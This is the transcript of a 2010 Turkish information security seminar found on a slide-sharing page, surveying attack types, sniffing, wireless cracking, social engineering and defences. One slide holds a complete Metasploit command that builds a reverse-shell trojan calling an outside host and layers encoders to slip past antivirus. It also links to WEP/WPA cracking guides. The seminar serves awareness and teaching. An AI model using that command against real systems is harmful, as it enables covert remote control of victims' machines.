Bilişim Güvenliği Semineri

Slides:



Advertisements
Benzer bir sunumlar
Bilgisayar Ağları Son Hafta
Advertisements

GÜVENLİ BİR E-POSTA UYGULAMASI: GÜ-POSTA
Bilgisayar ve İnternet Güvenliği
Ardesenmyo.wordpress.com.
Zafiyet Tespit Araçları – Eksileri/Artıları
BİLGİ GÜVENLİĞİ.
Siber Güvenlik Danışmanı
Ethical Hacking & Live Hacking
BİL Temel Bilgisayar Bilimleri
Bir Saldırının Senaryosu-2
Bilgisayar 1 Dr İsmail Marulcu Dr. Ismail Marulcu
İNTERNET VE BİLİŞİM SUÇLARI
Muğla, 2010 Yrd. Doç. Dr. Zerrin Ayvaz Reis 1, Doç Dr. Sevinç Gülseçen 2, Betül Bayrakdar 2 1 İstanbul Üniversitesi, Hasan Ali Yücel Eğitim Fakültesi Bilgisayar.
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
Kurumsal Bilgi Güvenliği Yönetim Süreci
Bilgi Güvenliği Şubesi
AĞ GÜVENLİĞİ.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Bilgisayar ve internet güvenliği için yardımcı programlar
Ağlarda Güvenlik Öğr. Gör. Mustafa SARIÖZ
İnternet Teknolojisi Temel Kavramlar
YONT171 Bilgi Teknolojilerine Giriş I
Kullanım Haklarına Göre Yazılım Türleri
Bilgisayar’da Virüsler, Zararlı Yazılımlar ve Alınacak Önlemler
Strateji Geliştirme Başkanlığı. Strateji Geliştirme Başkanlığı.
YONT171 Bilgi Teknolojilerine Giriş I
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Bilgi Teknolojileri Güvenlik Uzmanı (IT Security Specialist)
WORD 2010 BELGELERİNİ KORUMAK
METU-CC ODTÜ AntiVirüs Sistemi ODTÜ Bilgi İşlem Daire Başkanlığı İbrahim ÇALIŞIR 3 Ekim 2003.
BİLİŞİM SUÇLARI ve ALINACAK TEDBİRLER
İnternetin Güvenli Kullanımı ve Sosyal Ağlar
İnternet Teknolojisi Temel Kavramlar
Bilgi ve İletişim Teknolojisi
Bilgisayar ve Veri Güvenliği
Hacking – Ethical Hacking
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
BİLGİ GÜVENLİĞİ.
CEIT 101 Teorik Eser Çeker - Konu Bilgisayar ve Internette güvenlik Antivirüs-Yazılımları Ücretli başarılı antivirüs yazılımları: Norton, McAfee,
Bilgisayar ve Ağ Güvenliği
BİLGİSAYAR VİRÜSLERİ.
Bir bilgisayardan bir diğerine yayılmak ve bilgisayarın çalışmasına müdahale etmek amacıyla tasarlanmış küçük programlardır.
Bilişim Teknolojileri Kullanımında Güvenlik Temel Kavramlar ve Bilgi Güvenliği.
BİLİŞİM SUÇLARI ve ALINACAK TEDBİRLER
Bilgi Güvenligi Uzmanı
KÖTÜ AMAÇLI YAZILIMLAR
ÖMER ÜNALDI EDUROAM.
BİLGİSAYAR TEMEL KAVRAMLAR
1. 2 Siber güvenlik dünyasına yönelik, yenilikçi profesyonel çözümleri ile katkıda bulunmak amacı ile 2008 yılında kurulan BGA Bilgi Güvenliği A.Ş. stratejik.
VİRÜSLER VE DİĞER ZARARLI YAZILIMLAR. Virüs, casus yazılımlar (spyware), solucan, adware vb. zararlı yazılımlar (malware), reklam, sanal suçlar, bazen.
BİT’in Gizlilik ve Güvenlik Boyutları
YMT311 Bilgi Sistemleri ve Güvenliği Güvenlik ve Hacking Kavramları
Bilgisayar Ağlarında Güvenlik
Virüsler ve Diğer Zararlı Yazılımlar
BİLİŞİM TEKNOLOJİLERİ VE YAZILIM DERSİ
BİLGİSAYAR VİRÜSLERİ.
BİT’İN GİZLİLİK VE GÜVENLİK BOYUTLARI
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
Bilgisayarımıza bir anti-virüs programı yüklemeliyiz.
VİRÜS ÇEŞİTLERİ VE BULAŞMA YÖNTEMLERİ. VİRÜS NEDİR? Bilgisayar virüsleri, aslında "çalıştığında bilgisayarınıza değişik şekillerde zarar verebilen" bilgisayar.
BGM 555 Kablosuz Ağlarda Güvenlik ve Mahremiyet
Bilişim teknolajileri. ①①① ↕①↕① TEMEL KAVRAMLAR.
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
VİRÜSLER VE DİĞER ZARARLI YAZILIMLAR
TURKHAREKAT.COM Siber Güvenlik Eğitimlerine Hoşgeldiniz.
CASUS YAZILIMLAR ADI:SAKIP SOYADI:GÜL NO:74 SINIF:11/ATP.
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
GÜVENLİ İNTERNET KULLANIMI
Sunum transkripti:

Bilişim Güvenliği Semineri Ozan UÇAR Bilgi Güvenliği Araştırmacısı mail@ozanucar.com C|EHTURKİYE.COM @2010

Sunum Planı Bilişim Güvenliği “Hacker” ve “Güvenlik Uzmanı” kavramları Saldırı teknikleri Örnek saldırı uygulamaları Sosyal mühendislik saldırısı (Senaryo) Tehtitlere karşı alınabilecek önlemler

Bilişim Güvenliği Bilişim sistemlerinde işlenmekte olan verinin gizliliğini, bütünlülüğünü ve sürekliliğini korumayı amaçlayan bir alandır. Bilişim güvenliğinin temel amaçları; Veri bütünlüğünün korunması Erişim denetimi Mahremiyet ve Gizliliğin korunması Sistem devamlılığının sağlanması

Hacker Kimdir İyi derece sistem, ağ ve programlama bilgisine sahip ters toplum mühendisidir. Beyaz Şapkalılar; Bilişim teknoloji ve sistemlerini geliştirmek ve güvenliğini sağlamak temel amaçlarıdır.Güvenlik uzmanı olarakta adlandırılır. Gri Şapkalılar; Hem savunma hem saldırı amaçlı tamamen kazanca yönelik çalışırlar. Siyah Şapkalılar; Zarar vermek, para kazanmak için bilgilerini kullanırlar.

Saldırı Teknikleri Sistemlere Giriş Yöntemleri Exploit Etmek İstemci tabanlı saldırılar ClickJacking Flash Player, PDF Reader, Office Zayıflıkları Trojan ve keylogger casus yazılımlar Antivirusleri atlatma teknikleri Local ve Remote Exploitler Exploit Etmek

Saldırı Teknikleri -Devam Ağ tabanlı izleme,dinleme saldırıları Aktif Sniffing Arp Zehirlemesi Ortadaki Adam Saldırısı Pasif Sniffing Sosyal mühendislik saldırıları

Saldırı Teknikleri -Devam Kablosuz Ağ Saldırıları Gizli yayın yapan ağların tespit edilmesi WEP/WPA2 anahtarlı kablosuz ağların kırılması

Örnek Saldırı Denemeleri 1 Microsoft DLL Hijacking

Örnek Saldırı Denemeleri 1 Klavye girişlerini ve Ekran görüntüsünü ele geçirmek

Örnek Saldırı Denemeleri 1 Antivirüsler, imzatabanlı çalışır. Gelişmiş antivirüsler, shell test yaparak içeriği analiz edebilir veya sezgisel olarak yazılımın hareketlerini algılayabilir Örnek ./msfpayload windows/shell_reverse_tcp LHOST=ozan.dyndns.org LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/trojan.exe

Örnek Saldırı Denemeleri 2 Tarama sonuçları ; www.virustotal.com/file-scan/report.html?id=9b524a487ed70317000c787d9354d02f404cfa80712c6bd1733bc4d97d3cdad1-1288544256

Sosyal Mühendislik Saldırıları Facebook, Twitter, Banka Hesapları Avlama Teknikleri Aldatma sanatı Gerçek dünyadan örnekler 

Örnek Saldırı Denemeleri 3

İnternet Trafiği Nasıl Dinleniyor Aktif Sniffing; 1.1.1.1 ip adresi benim mac adresim 00-0c-29-6d-d1-ef

İnternet Trafiği Nasıl Dinleniyor Pasif Sniffing;

İnternet Trafiği Nasıl Dinleniyor

Kablosuz Ağ Saldırıları Kablosuz ağlar nasıl çalışır Güvenlik Seçenekleri Saldırı Yöntemleri WEP, WPA anahtarlarının güvenliği

Kablosuz Ağ Saldırıları

WEP/WPA Crack http://cehturkiye.com//wireless-hacking/wep-cracking.html http://www.cehturkiye.com/index.php/2010/06/07/wireless-pentest-wpa-crack/wireless-pentest-wpa-crack.html

Tehtitlere karşı alınabilecek önlemler Eğitim şart Halka açık ortamlarda güvenli internet kullanımı Ultrasurf, TOR, Tünelleme yazılımları Lisanslı, güncel yazılımlar (korsana hayır)